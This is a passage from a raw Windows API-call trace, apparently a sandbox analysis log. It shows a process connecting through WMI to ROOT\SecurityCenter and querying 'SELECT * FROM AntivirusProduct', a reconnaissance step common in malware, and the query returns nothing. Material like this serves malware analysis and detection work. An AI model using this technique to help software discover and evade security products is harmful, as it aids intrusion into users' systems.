Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x768dd8) returned 0x0 [0215.605] WbemDefPath:IUnknown:AddRef (This=0x768dd8) returned 0x3 [0215.605] WbemDefPath:IUnknown:Release (This=0x768dd8) returned 0x2 [0215.605] WbemDefPath:IWbemPath:SetText (This=0x768dd8, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768dd8, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x18, pszText=0x0) returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f29c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f29c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768dd8, puCount=0x36f28c | out: puCount=0x36f28c*=0x2) returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f288*=0x0, pszText=0x0 | out: puBuffLength=0x36f288*=0x18, pszText=0x0) returned 0x0 [0215.605] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f288*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f288*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.605] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f21c | out: ppv=0x36f21c*=0x6ee4bc) returned 0x0 [0215.605] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f214 | out: pAptType=0x36f214*=1) returned 0x0 [0215.605] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f218 | out: ppvObject=0x36f218*=0x0) returned 0x80004002 [0215.605] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.606] CoGetClassObject (in: rclsid=0x761b14*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ee38 | out: ppv=0x36ee38*=0x787ff8) returned 0x0 [0215.606] WbemLocator:IUnknown:QueryInterface (in: This=0x787ff8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36f050 | out: ppvObject=0x36f050*=0x0) returned 0x80004002 [0215.606] WbemLocator:IClassFactory:CreateInstance (in: This=0x787ff8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f05c | out: ppvObject=0x36f05c*=0x5e890f0) returned 0x0 [0215.606] WbemLocator:IUnknown:Release (This=0x787ff8) returned 0x0 [0215.606] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ec7c | out: ppvObject=0x36ec7c*=0x5e890f0) returned 0x0 [0215.606] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36ec30 | out: ppvObject=0x36ec30*=0x0) returned 0x80004002 [0215.607] WbemLocator:IUnknown:AddRef (This=0x5e890f0) returned 0x3 [0215.607] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e58c | out: ppvObject=0x36e58c*=0x0) returned 0x80004002 [0215.607] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e53c | out: ppvObject=0x36e53c*=0x0) returned 0x80004002 [0215.607] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e548 | out: ppvObject=0x36e548*=0x0) returned 0x80004002 [0215.607] CoGetContextToken (in: pToken=0x36e5a8 | out: pToken=0x36e5a8) returned 0x0 [0215.607] CoGetContextToken (in: pToken=0x36e9bc | out: pToken=0x36e9bc) returned 0x0 [0215.607] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea3c | out: ppvObject=0x36ea3c*=0x0) returned 0x80004002 [0215.607] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x2 [0215.607] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x1 [0215.607] CoGetContextToken (in: pToken=0x36f03c | out: pToken=0x36f03c) returned 0x0 [0215.607] CoGetContextToken (in: pToken=0x36ef9c | out: pToken=0x36ef9c) returned 0x0 [0215.607] WbemLocator:IUnknown:QueryInterface (in: This=0x5e890f0, riid=0x36f06c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36f068 | out: ppvObject=0x36f068*=0x5e890f0) returned 0x0 [0215.607] WbemLocator:IUnknown:AddRef (This=0x5e890f0) returned 0x3 [0215.607] WbemLocator:IUnknown:Release (This=0x5e890f0) returned 0x2 [0215.607] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768dd8, puCount=0x36f1f8 | out: puCount=0x36f1f8*=0x2) returned 0x0 [0215.607] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=8, puBuffLength=0x36f1f4*=0x0, pszText=0x0 | out: puBuffLength=0x36f1f4*=0x18, pszText=0x0) returned 0x0 [0215.607] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=8, puBuffLength=0x36f1f4*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f1f4*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.607] CoCreateInstance (in: rclsid=0x727c3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x727c3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x36f090 | out: ppv=0x36f090*=0x5e890e0) returned 0x0 [0215.607] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e890e0, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x36f144 | out: ppNamespace=0x36f144*=0x792d88) returned 0x0 [0215.620] WbemLocator:IUnknown:QueryInterface (in: This=0x792d88, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efb4 | out: ppvObject=0x36efb4*=0x784df4) returned 0x0 [0215.620] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x784df4, pProxy=0x792d88, pAuthnSvc=0x36f004, pAuthzSvc=0x36f000, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc, pImpLevel=0x36efec, pAuthInfo=0x36eff0, pCapabilites=0x36eff4 | out: pAuthnSvc=0x36f004*=0xa, pAuthzSvc=0x36f000*=0x0, pServerPrincName=0x36eff8, pAuthnLevel=0x36effc*=0x6, pImpLevel=0x36efec*=0x2, pAuthInfo=0x36eff0, pCapabilites=0x36eff4*=0x1) returned 0x0 [0215.620] WbemLocator:IUnknown:Release (This=0x784df4) returned 0x1 [0215.620] WbemLocator:IUnknown:QueryInterface (in: This=0x792d88, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36efa8 | out: ppvObject=0x36efa8*=0x784e14) returned 0x0 [0215.620] WbemLocator:IUnknown:QueryInterface (in: This=0x792d88, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ef94 | out: ppvObject=0x36ef94*=0x784df4) returned 0x0 [0215.620] WbemLocator:IClientSecurity:SetBlanket (This=0x784df4, pProxy=0x792d88, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.620] WbemLocator:IUnknown:Release (This=0x784df4) returned 0x2 [0215.620] WbemLocator:IUnknown:Release (This=0x784e14) returned 0x1 [0215.620] CoTaskMemFree (pv=0x793f78) [0215.620] WbemLocator:IUnknown:AddRef (This=0x792d88) returned 0x2 [0215.621] WbemLocator:IUnknown:Release (This=0x5e890e0) returned 0x0 [0215.621] CoGetContextToken (in: pToken=0x36e4e8 | out: pToken=0x36e4e8) returned 0x0 [0215.621] CoGetContextToken (in: pToken=0x36e8fc | out: pToken=0x36e8fc) returned 0x0 [0215.621] WbemLocator:IUnknown:QueryInterface (in: This=0x792d88, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e894 | out: ppvObject=0x36e894*=0x784dfc) returned 0x0 [0215.621] WbemLocator:IRpcOptions:Query (in: This=0x784dfc, pPrx=0x5e8d760, dwProperty=2, pdwValue=0x36e988 | out: pdwValue=0x36e988) returned 0x80004002 [0215.621] WbemLocator:IUnknown:Release (This=0x784dfc) returned 0x2 [0215.621] CoGetContextToken (in: pToken=0x36eecc | out: pToken=0x36eecc) returned 0x0 [0215.621] CoGetContextToken (in: pToken=0x36ee2c | out: pToken=0x36ee2c) returned 0x0 [0215.622] WbemLocator:IUnknown:QueryInterface (in: This=0x792d88, riid=0x36eefc*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x36edc8 | out: ppvObject=0x36edc8*=0x792d88) returned 0x0 [0215.622] WbemLocator:IUnknown:Release (This=0x792d88) returned 0x2 [0215.622] SysStringLen (param_1=0x0) returned 0x0 [0215.622] CoGetContextToken (in: pToken=0x36effc | out: pToken=0x36effc) returned 0x0 [0215.622] IWbemServices:ExecQuery (in: This=0x792d88, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x36f204 | out: ppEnum=0x36f204*=0x70f928) returned 0x0 [0215.628] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f060 | out: ppvObject=0x36f060*=0x70f92c) returned 0x0 [0215.628] IClientSecurity:QueryBlanket (in: This=0x70f92c, pProxy=0x70f928, pAuthnSvc=0x36f0b0, pAuthzSvc=0x36f0ac, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8, pImpLevel=0x36f098, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0 | out: pAuthnSvc=0x36f0b0*=0xa, pAuthzSvc=0x36f0ac*=0x0, pServerPrincName=0x36f0a4, pAuthnLevel=0x36f0a8*=0x6, pImpLevel=0x36f098*=0x2, pAuthInfo=0x36f09c, pCapabilites=0x36f0a0*=0x1) returned 0x0 [0215.628] IUnknown:Release (This=0x70f92c) returned 0x1 [0215.628] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f054 | out: ppvObject=0x36f054*=0x784a54) returned 0x0 [0215.628] IUnknown:QueryInterface (in: This=0x70f928, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f040 | out: ppvObject=0x36f040*=0x70f92c) returned 0x0 [0215.628] IClientSecurity:SetBlanket (This=0x70f92c, pProxy=0x70f928, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.630] IUnknown:Release (This=0x70f92c) returned 0x2 [0215.630] WbemLocator:IUnknown:Release (This=0x784a54) returned 0x1 [0215.630] CoTaskMemFree (pv=0x793fa8) [0215.630] IUnknown:AddRef (This=0x70f928) returned 0x2 [0215.630] CoGetContextToken (in: pToken=0x36e580 | out: pToken=0x36e580) returned 0x0 [0215.630] CoGetContextToken (in: pToken=0x36e994 | out: pToken=0x36e994) returned 0x0 [0215.630] IUnknown:QueryInterface (in: This=0x70f928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e92c | out: ppvObject=0x36e92c*=0x784a3c) returned 0x0 [0215.630] WbemLocator:IRpcOptions:Query (in: This=0x784a3c, pPrx=0x5e8d748, dwProperty=2, pdwValue=0x36ea20 | out: pdwValue=0x36ea20) returned 0x80004002 [0215.630] WbemLocator:IUnknown:Release (This=0x784a3c) returned 0x2 [0215.631] CoGetContextToken (in: pToken=0x36ef64 | out: pToken=0x36ef64) returned 0x0 [0215.631] CoGetContextToken (in: pToken=0x36eec4 | out: pToken=0x36eec4) returned 0x0 [0215.631] IUnknown:QueryInterface (in: This=0x70f928, riid=0x36ef94*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ee60 | out: ppvObject=0x36ee60*=0x70f928) returned 0x0 [0215.631] IUnknown:Release (This=0x70f928) returned 0x2 [0215.631] SysStringLen (param_1=0x0) returned 0x0 [0215.631] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768dd8, puCount=0x36f250 | out: puCount=0x36f250*=0x2) returned 0x0 [0215.631] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f24c*=0x0, pszText=0x0 | out: puBuffLength=0x36f24c*=0x18, pszText=0x0) returned 0x0 [0215.631] WbemDefPath:IWbemPath:GetText (in: This=0x768dd8, lFlags=4, puBuffLength=0x36f24c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x36f24c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0215.631] CoGetContextToken (in: pToken=0x36f0a4 | out: pToken=0x36f0a4) returned 0x0 [0215.631] IEnumWbemClassObject:Clone (in: This=0x70f928, ppEnum=0x36f25c | out: ppEnum=0x36f25c*=0x70f9f0) returned 0x0 [0215.633] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f118 | out: ppvObject=0x36f118*=0x70f9f4) returned 0x0 [0215.633] IClientSecurity:QueryBlanket (in: This=0x70f9f4, pProxy=0x70f9f0, pAuthnSvc=0x36f168, pAuthzSvc=0x36f164, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160, pImpLevel=0x36f150, pAuthInfo=0x36f154, pCapabilites=0x36f158 | out: pAuthnSvc=0x36f168*=0xa, pAuthzSvc=0x36f164*=0x0, pServerPrincName=0x36f15c, pAuthnLevel=0x36f160*=0x6, pImpLevel=0x36f150*=0x2, pAuthInfo=0x36f154, pCapabilites=0x36f158*=0x1) returned 0x0 [0215.633] IUnknown:Release (This=0x70f9f4) returned 0x1 [0215.633] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f10c | out: ppvObject=0x36f10c*=0x784ff4) returned 0x0 [0215.633] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x727c35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36f0f8 | out: ppvObject=0x36f0f8*=0x70f9f4) returned 0x0 [0215.633] IClientSecurity:SetBlanket (This=0x70f9f4, pProxy=0x70f9f0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.634] IUnknown:Release (This=0x70f9f4) returned 0x2 [0215.634] WbemLocator:IUnknown:Release (This=0x784ff4) returned 0x1 [0215.634] CoTaskMemFree (pv=0x793fd8) [0215.635] IUnknown:AddRef (This=0x70f9f0) returned 0x2 [0215.635] CoGetContextToken (in: pToken=0x36e628 | out: pToken=0x36e628) returned 0x0 [0215.635] CoGetContextToken (in: pToken=0x36ea3c | out: pToken=0x36ea3c) returned 0x0 [0215.635] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e9d4 | out: ppvObject=0x36e9d4*=0x784fdc) returned 0x0 [0215.635] WbemLocator:IRpcOptions:Query (in: This=0x784fdc, pPrx=0x5e8d7f0, dwProperty=2, pdwValue=0x36eac8 | out: pdwValue=0x36eac8) returned 0x80004002 [0215.635] WbemLocator:IUnknown:Release (This=0x784fdc) returned 0x2 [0215.635] CoGetContextToken (in: pToken=0x36f00c | out: pToken=0x36f00c) returned 0x0 [0215.635] CoGetContextToken (in: pToken=0x36ef6c | out: pToken=0x36ef6c) returned 0x0 [0215.635] IUnknown:QueryInterface (in: This=0x70f9f0, riid=0x36f03c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x36ef08 | out: ppvObject=0x36ef08*=0x70f9f0) returned 0x0 [0215.636] IUnknown:Release (This=0x70f9f0) returned 0x2 [0215.636] SysStringLen (param_1=0x0) returned 0x0 [0215.636] IEnumWbemClassObject:Reset (This=0x70f9f0) returned 0x0 [0215.637] CoTaskMemAlloc (cb=0x4) returned 0x5e891c0 [0215.637] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e891c0, puReturned=0x2469758 | out: apObjects=0x5e891c0*=0x0, puReturned=0x2469758*=0x0) returned 0x1 [0215.637] CoTaskMemFree (pv=0x5e891c0) [0215.637] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.638] IUnknown:Release (This=0x70f9f0) returned 0x1 [0215.638] IUnknown:Release (This=0x70f9f0) returned 0x0 [0215.638] CoGetContextToken (in: pToken=0x36f180 | out: pToken=0x36f180) returned 0x0 [0215.639] IUnknown:Release (This=0x70f928) returned 0x1 [0215.639] IUnknown:Release (This=0x70f928) returned 0x0 [0215.640] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f278 | out: ppv=0x36f278*=0x6ee4bc) returned 0x0 [0215.640] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f270 | out: pAptType=0x36f270*=1) returned 0x0 [0215.640] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f274 | out: ppvObject=0x36f274*=0x0) returned 0x80004002 [0215.640] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0215.640] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36ebe0 | out: ppv=0x36ebe0*=0x5e891c0) returned 0x0 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e891c0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36edf8 | out: ppvObject=0x36edf8*=0x0) returned 0x80004002 [0215.641] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e891c0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ee04 | out: ppvObject=0x36ee04*=0x768e48) returned 0x0 [0215.641] WbemDefPath:IUnknown:Release (This=0x5e891c0) returned 0x0 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ea24 | out: ppvObject=0x36ea24*=0x768e48) returned 0x0 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e9d8 | out: ppvObject=0x36e9d8*=0x0) returned 0x80004002 [0215.641] WbemDefPath:IUnknown:AddRef (This=0x768e48) returned 0x3 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e334 | out: ppvObject=0x36e334*=0x0) returned 0x80004002 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e2e4 | out: ppvObject=0x36e2e4*=0x0) returned 0x80004002 [0215.641] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e2f0 | out: ppvObject=0x36e2f0*=0x5e89180) returned 0x0 [0215.641] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89180, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e2f8 | out: pCid=0x36e2f8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.641] WbemDefPath:IUnknown:Release (This=0x5e89180) returned 0x3 [0215.641] CoGetContextToken (in: pToken=0x36e350 | out: pToken=0x36e350) returned 0x0 [0215.642] CoGetContextToken (in: pToken=0x36e764 | out: pToken=0x36e764) returned 0x0 [0215.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e7e4 | out: ppvObject=0x36e7e4*=0x0) returned 0x80004002 [0215.642] WbemDefPath:IUnknown:Release (This=0x768e48) returned 0x2 [0215.642] WbemDefPath:IUnknown:Release (This=0x768e48) returned 0x1 [0215.642] CoGetContextToken (in: pToken=0x36f0fc | out: pToken=0x36f0fc) returned 0x0 [0215.642] CoGetContextToken (in: pToken=0x36f05c | out: pToken=0x36f05c) returned 0x0 [0215.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x768e48, riid=0x36f12c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f128 | out: ppvObject=0x36f128*=0x768e48) returned 0x0 [0215.642] WbemDefPath:IUnknown:AddRef (This=0x768e48) returned 0x3 [0215.642] WbemDefPath:IUnknown:Release (This=0x768e48) returned 0x2 [0215.642] WbemDefPath:IWbemPath:SetText (This=0x768e48, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0215.642] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768e48, puCount=0x36f2a0 | out: puCount=0x36f2a0*=0x2) returned 0x0 [0215.642] WbemDefPath:IWbemPath:GetText (in: This=0x768e48, lFlags=4, puBuffLength=0x36f29c*=0x0, pszText=0x0 | out: puBuffLength=0x36f29c*=0x18, pszText=0x0) returned 0x0 